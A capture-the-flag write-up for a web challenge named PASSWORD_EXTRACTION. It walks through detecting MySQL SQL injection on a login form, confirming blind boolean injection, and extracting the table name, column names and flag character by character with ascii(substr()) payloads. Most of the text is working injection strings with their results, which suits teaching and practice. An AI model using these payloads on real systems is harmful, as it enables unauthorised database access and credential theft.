# ▼▼▼PASSWORD_EXTRACTION(Web:50pts,211/661=31.9％)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

---

## 【Identify database】

```
username=&password='union select 1,1-- ⇒　Invalid login info.
username=&password='union select 1,1--+　⇒　You've successfully authorized, but that doesn't get you the password.
```
↓

**SQL Injection** vulnerability exists ,and `+` Is required. This is the behavior of **MySQL**

---

## 【Finding an attack method】

`limit 1` is required because it is checked that the number of data that can be acquired is **one**

↓

```
username=&password='or(1=1)limit 1--+　⇒　You've successfully authorized, but that doesn't get you the password.
username=&password='or(1=0)limit 1--+　⇒　Invalid login info.
```

↓

The results are different. **Blind SQL Injection** is possible.

---

## 【Get table and column names】

```
username=&password='or 97=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))--+　　⇒a
username=&password='or 99=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))--+　　⇒c
username=&password='or 99=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))--+　　⇒c
username=&password='or 111=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))--+　　⇒o
username=&password='or 117=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),5,1))--+　　⇒u
username=&password='or 110=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),6,1))--+　　⇒n
username=&password='or 116=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),7,1))--+　　⇒t
username=&password='or 115=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),8,1))--+　　⇒s
```

↓

table name is `accounts`

---

```
username=&password='or 112=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),1,1))--+　　⇒p
username=&password='or 97=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),2,1))--+　　⇒a
username=&password='or 115=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),3,1))--+　　⇒s
username=&password='or 115=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),4,1))--+　　⇒s
username=&password='or 119=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),5,1))--+　　⇒w
username=&password='or 111=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),6,1))--+　　⇒o
username=&password='or 114=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),7,1))--+　　⇒r
username=&password='or 100=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),8,1))--+　　⇒d
```

↓

column name is `username`,`password`

---

## 【Get flag】

```
username=&password='or 103=ascii(substr(password,1,1)) limit 1--+ ⇒g
username=&password='or 105=ascii(substr(password,2,1)) limit 1--+ ⇒i
username=&password='or 103=ascii(substr(password,3,1)) limit 1--+ ⇒g
username=&password='or 101=ascii(substr(password,4,1)) limit 1--+ ⇒e
username=&password='or 109=ascii(substr(password,5,1)) limit 1--+ ⇒m
username=&password='or 123=ascii(substr(password,6,1)) limit 1--+ ⇒{
～(省略)～
username=&password='or 125=ascii(substr(password,26,1)) limit 1--+　⇒}
```

↓

`gigem{h0peYouScr1ptedTh1s}`